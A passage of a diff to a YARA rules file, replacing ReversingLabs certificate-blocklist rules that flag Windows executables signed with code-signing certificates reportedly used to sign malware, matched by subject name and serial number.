-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2 TOY GUYS LLC" and ( pe.signatures [ i ] . serial == "00:81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" or pe.signatures [ i ] . serial == "81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" ) and 1571616000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Syncode Sistemas e Tecnologia Ltda" and ( pe.signatures [ i ] . serial == "00:e8:6f:46:b6:01:42:09:2a:ae:81:b8:f6:fa:3d:9c:7c" or pe.signatures [ i ] . serial == "e8:6f:46:b6:01:42:09:2a:ae:81:b8:f6:fa:3d:9c:7c" ) and 1373932799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_277Cd16De5D61B9398B645Afe41C09C7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1A0Fd2A4Ef4C2A36Ab9C5E8F792A35E2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d863faac-7b6e-5e1d-960f-8379347c6838"
+		id = "7148a21a-97d6-59a2-a1cf-442c271bc0b5"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8658-L8674"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2654-L2670"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "696467d699dec060b205f36f53dbe157b241823757d72798b35235d6530fd193"
+		logic_hash = "8e768415998a6a92961986cb0a9d310514d928be93b3e5a9aaa9ec71bf5886ad"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18845,21 +41239,21 @@ rule REVERSINGLABS_Cert_Blocklist_277Cd16De5D61B9398B645Afe41C09C7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE SIGN COMPANY LIMITED" and pe.signatures [ i ] . serial == "27:7c:d1:6d:e5:d6:1b:93:98:b6:45:af:e4:1c:09:c7" and 1619049600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE9\\x87\\x91\\xE5\\x88\\xA9\\xE5\\xAE\\x8F\\xE6\\x98\\x8C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "1a:0f:d2:a4:ef:4c:2a:36:ab:9c:5e:8f:79:2a:35:e2" and 1389311999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D0Eda76C13D30C97015708790Bb94214 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_53Bb753B79A99E61A6E822Ac52460C70 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "aa323bac-a9f5-560f-b44a-3cf2b26351bb"
+		id = "6339d548-775b-52b9-84c5-a79de23a16b2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8676-L8694"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2672-L2688"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2112ebfb7c9ebbbccb20cefcd23bb49142da770feb16ee8eef5eb27646226785"
+		logic_hash = "24ff4f46fa6e85c25e130459f9b8d6907cf6cd51098e0cf45ec11d54d7de509b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18869,21 +41263,21 @@ rule REVERSINGLABS_Cert_Blocklist_D0Eda76C13D30C97015708790Bb94214 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LAEN ApS" and ( pe.signatures [ i ] . serial == "00:d0:ed:a7:6c:13:d3:0c:97:01:57:08:79:0b:b9:42:14" or pe.signatures [ i ] . serial == "d0:ed:a7:6c:13:d3:0c:97:01:57:08:79:0b:b9:42:14" ) and 1619136000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xEB\\x8D\\xB0\\xEC\\x8A\\xA4\\xED\\x81\\xAC\\xED\\x83\\x91\\xEC\\x95\\x84\\xEC\\x9D\\xB4\\xEC\\xBD\\x98" and pe.signatures [ i ] . serial == "53:bb:75:3b:79:a9:9e:61:a6:e8:22:ac:52:46:0c:70" and 1400543999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6333Ed618F88A05B4D82Ad7Bf66Cb0Fa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_83F68Fc6834Bf8Bd2C801A2D1F1Acc76 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c4d3603e-57e2-57df-a055-c43d449242c7"
+		id = "763d4faf-19af-5349-a643-4773055df47a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8696-L8712"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2690-L2708"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b088ac4b74a8cf3dddb67c8de2b7c3c5f537287a0454c0030c0eb4069c465c7d"
+		logic_hash = "35552242f9f0a56b45e30e6f376877446f33e24690ff5d7b03dc776fab178afd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18893,21 +41287,21 @@ rule REVERSINGLABS_Cert_Blocklist_6333Ed618F88A05B4D82Ad7Bf66Cb0Fa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RHM LIMITED" and pe.signatures [ i ] . serial == "63:33:ed:61:8f:88:a0:5b:4d:82:ad:7b:f6:6c:b0:fa" and 1616457600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Helpful Technologies, Inc" and ( pe.signatures [ i ] . serial == "00:83:f6:8f:c6:83:4b:f8:bd:2c:80:1a:2d:1f:1a:cc:76" or pe.signatures [ i ] . serial == "83:f6:8f:c6:83:4b:f8:bd:2c:80:1a:2d:1f:1a:cc:76" ) and 1407715199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3B777165B125Bccc181D0Bac3F5B55B3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F385E765Acfb95605C9B35Ca4C32F80E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f065e99f-9cce-55cb-a592-60b89c26028a"
+		id = "865f8daf-35c4-5437-9c97-9b9fc48d7d70"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8714-L8730"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2710-L2728"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "80aff3d6f45f5847d5d39b170b9d0e70168d02569ca6d86a2c39150399d290fc"
+		logic_hash = "c73c8f1913d3423a52f5e77751813460ae9200eb3cb1cc6e2ec30f37f0da8152"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18917,21 +41311,21 @@ rule REVERSINGLABS_Cert_Blocklist_3B777165B125Bccc181D0Bac3F5B55B3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STAND ALONE MUSIC LTD" and pe.signatures [ i ] . serial == "3b:77:71:65:b1:25:bc:cc:18:1d:0b:ac:3f:5b:55:b3" and 1607299200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CWI SOFTWARE LTDA" and ( pe.signatures [ i ] . serial == "00:f3:85:e7:65:ac:fb:95:60:5c:9b:35:ca:4c:32:f8:0e" or pe.signatures [ i ] . serial == "f3:85:e7:65:ac:fb:95:60:5c:9b:35:ca:4c:32:f8:0e" ) and 1382313599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5B37Ac3479283B6F9D75Ddf0F8742D06 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F62C9C4Efc81Caf0D5A2608009D48018 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cc124d3f-2446-57a2-a206-0a5e569fc703"
+		id = "176434ae-7162-5b35-91f7-888536250884"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8732-L8748"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2730-L2748"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b7abd389ac31cd970e6611c7c303714fdd658f45d4857ad524f5e8368edbb875"
+		logic_hash = "08fcff795297c0608b1a1d71465279cbf76d4dff06de2a2262a58debbb2f9e0d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18941,21 +41335,21 @@ rule REVERSINGLABS_Cert_Blocklist_5B37Ac3479283B6F9D75Ddf0F8742D06 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ART BOOK PHOTO s.r.o." and pe.signatures [ i ] . serial == "5b:37:ac:34:79:28:3b:6f:9d:75:dd:f0:f8:74:2d:06" and 1619740800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x94\\x90\\xE5\\xB1\\xB1\\xE4\\xB8\\x87\\xE4\\xB8\\x9C\\xE6\\xB6\\xA6\\xE6\\x92\\xAD\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:f6:2c:9c:4e:fc:81:ca:f0:d5:a2:60:80:09:d4:80:18" or pe.signatures [ i ] . serial == "f6:2c:9c:4e:fc:81:ca:f0:d5:a2:60:80:09:d4:80:18" ) and 1292889599 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3112C69D460C781Fd649C71E61Bfec82 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Cc8D902Da36587C9B2113Cd76C3C3F8D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f4d2f240-49a7-51f3-8db1-1c569aa63177"
+		id = "f9e542aa-eaa5-50a5-95dc-fb55f8575c89"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8750-L8766"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2750-L2768"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ed31b0a24d18a451163867f0f49df12af3ca0768f250ac8ce66d41405393130d"
+		logic_hash = "25e524d23ccc1c06f602a086369ffd44b8c97b76c29f068764081339556b3465"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18965,21 +41359,21 @@ rule REVERSINGLABS_Cert_Blocklist_3112C69D460C781Fd649C71E61Bfec82 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KREATURHANDLER BJARNE ANDERSEN ApS" and pe.signatures [ i ] . serial == "31:12:c6:9d:46:0c:78:1f:d6:49:c7:1e:61:bf:ec:82" and 1614902400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE9\\x87\\x91\\xE4\\xBF\\x8A\\xE5\\x9D\\xA4\\xE8\\xAE\\xA1\\xE7\\xAE\\x97\\xE6\\x9C\\xBA\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x8D\\xE5\\x8A\\xA1\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:cc:8d:90:2d:a3:65:87:c9:b2:11:3c:d7:6c:3c:3f:8d" or pe.signatures [ i ] . serial == "cc:8d:90:2d:a3:65:87:c9:b2:11:3c:d7:6c:3c:3f:8d" ) and 1292544000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A5B4F67Ad8B22Afc2Debe6Ce5F8F679 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_328Bdcc0F679C4649147Fbb3Eb0E9Bc6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7dd5ba42-2d04-52d7-b15a-2bdba2e742fb"
+		id = "8e2c2204-8905-5e05-9ec8-e1577ae4c2cb"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8768-L8784"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2770-L2786"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "938efb7ee19970484aded5cd46b2ff730f8882706bec3f062bdebde3cc9a4799"
+		logic_hash = "6d9e1f25ca252ca9dda7714c52a2e57fd3b5dca08cd2a45c9dec18a31d3bb342"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -18989,21 +41383,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A5B4F67Ad8B22Afc2Debe6Ce5F8F679 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Farad LLC" and pe.signatures [ i ] . serial == "0a:5b:4f:67:ad:8b:22:af:c2:de:be:6c:e5:f8:f6:79" and 1607472000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nooly Systems LTD" and pe.signatures [ i ] . serial == "32:8b:dc:c0:f6:79:c4:64:91:47:fb:b3:eb:0e:9b:c6" and 1204847999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Df45B36C9D0Bd248C3F9494E7Ca822 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5F78149Eb4F75Eb17404A8143Aaeaed7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d7d0d1c4-b341-5651-8179-4035f537ba98"
+		id = "4c9d3bba-4e7f-5bf5-ab90-f2b900ec0b2a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8786-L8804"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2788-L2804"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9c03522376b0d807cd36a0641e474d770bc3b4f8221f26d232878d2d320d072b"
+		logic_hash = "0c7c9e8d2a9304e0407b8a1a29977312a9ba766a4052c6b874855fa187c85585"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19013,21 +41407,21 @@ rule REVERSINGLABS_Cert_Blocklist_Df45B36C9D0Bd248C3F9494E7Ca822 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MPO STORITVE d.o.o." and ( pe.signatures [ i ] . serial == "00:df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22" or pe.signatures [ i ] . serial == "df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22" ) and 1619740800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE5\\x9F\\x9F\\xE8\\x81\\x94\\xE8\\xBD\\xAF\\xE4\\xBB\\xB6\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "5f:78:14:9e:b4:f7:5e:b1:74:04:a8:14:3a:ae:ae:d7" and 1303116124 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Ae3C4Eccecda2127D43Be390A850Dda : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_629D120Dd84F9C1688D4Da40366Fab7A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a9d8906b-64f6-5c5d-80e0-ab916e83b613"
+		id = "7e6249ba-3a4f-5096-be32-779e73c88221"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8806-L8822"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2806-L2822"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8a2ff4f7a5ac996127778b1670e79291bddcb5dee6e7da2b540fd254537ee27e"
+		logic_hash = "187f6ef0de869500526d1b0d5c6f6762b0a939e06781e633a602834687c64023"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19037,21 +41431,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Ae3C4Eccecda2127D43Be390A850Dda : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PARTYNET LIMITED" and pe.signatures [ i ] . serial == "1a:e3:c4:ec:ce:cd:a2:12:7d:43:be:39:0a:85:0d:da" and 1614902400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Delta Controls" and pe.signatures [ i ] . serial == "62:9d:12:0d:d8:4f:9c:16:88:d4:da:40:36:6f:ab:7a" and 1306799999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2E36360538624C9B1Afd78A2Fb756028 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_039E5D0E3297F574Db99E1D9503853D9 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "549a566b-0c94-516c-9231-a5e54136785f"
+		id = "969ffa17-de06-58d5-a74e-c115b49a9a6c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8824-L8840"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2824-L2840"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9cbb50c7d383048fd506506fa9ee8bf7c6d82feaf21bcde4008ab99b82e234a7"
+		logic_hash = "2f150f60b7dce583fc68705f0b29a7c8684f1b69020275b2ec1ac6beeaa63952"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19061,21 +41455,21 @@ rule REVERSINGLABS_Cert_Blocklist_2E36360538624C9B1Afd78A2Fb756028 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ts Trade ApS" and pe.signatures [ i ] . serial == "2e:36:36:05:38:62:4c:9b:1a:fd:78:a2:fb:75:60:28" and 1615766400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cigam Software Corporativo LTDA" and pe.signatures [ i ] . serial == "03:9e:5d:0e:32:97:f5:74:db:99:e1:d9:50:38:53:d9" and 1378079999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Addb899F8229Fd53E6435E08Bbd3A733 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Bc32Bbe5Bbb4F06F490C50651Cd5Da50 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1e5f0577-ba05-5e43-a817-c75f65547c3d"
+		id = "eb6ccc6d-2a66-5113-8b78-c32012431123"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8842-L8860"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2842-L2860"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ecb8e31b8c56b92cef601618e0adc2f6d88999318805b92389693aa9e8050d18"
+		logic_hash = "104be481b7d4b1cb3c43c72314afc3641983838b5177c34a88d6da0d0e7b89c9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19085,21 +41479,21 @@ rule REVERSINGLABS_Cert_Blocklist_Addb899F8229Fd53E6435E08Bbd3A733 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "U.K. STEEL EXPORTS LIMITED" and ( pe.signatures [ i ] . serial == "00:ad:db:89:9f:82:29:fd:53:e6:43:5e:08:bb:d3:a7:33" or pe.signatures [ i ] . serial == "ad:db:89:9f:82:29:fd:53:e6:43:5e:08:bb:d3:a7:33" ) and 1616630400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Remedica Medical Education and Publishing Ltd" and ( pe.signatures [ i ] . serial == "00:bc:32:bb:e5:bb:b4:f0:6f:49:0c:50:65:1c:d5:da:50" or pe.signatures [ i ] . serial == "bc:32:bb:e5:bb:b4:f0:6f:49:0c:50:65:1c:d5:da:50" ) and 1387151999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C1A1Db95D7Bf80290Aa6E82D8F8F996A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3E1656Dfcaacfed7C2D2564355698Aa3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c04a2731-5eb8-5db4-9e88-cab9b61952e4"
+		id = "57b75eaa-2cb2-5713-8eb3-065f90a1fdd5"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8862-L8880"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2862-L2878"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "84c7c0e53facadcdfd752e9cf3811fbfd6aac4bef4109acf430a67b6dcd37bfc"
+		logic_hash = "ba7cca8d71f571644cabd3d491cddefffd05ca7a838f262a343a01e4a09bb72a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -19109,21 +41503,21 @@ rule REVERSINGLABS_Cert_Blocklist_C1A1Db95D7Bf80290Aa6E82D8F8F996A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Software Two Pty Ltd" and ( pe.signatures [ i ] . serial == "00:c1:a1:db:95:d7:bf:80:29:0a:a6:e8:2d:8f:8f:99:6a" or pe.signatures [ i ] . serial == "c1:a1:db:95:d7:bf:80:29:0a:a6:e8:2d:8f:8f:99:6a" ) and 1615334400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "John W.Richard" and pe.signatures [ i ] . serial == "3e:16:56:df:ca:ac:fe:d7:c2:d2:56:43:55:69:8a:a3" and 1385251199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C667Ffe3A5B0A5Ae7Cf3A9E41682E91B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Bf1D68E926E2Dd8966008C44F95Ea1C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "83a5e5c2-0932-526b-80aa-800b37088bbd"
+		id = "c82170a4-911c-5206-bae8-6503a5449df9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
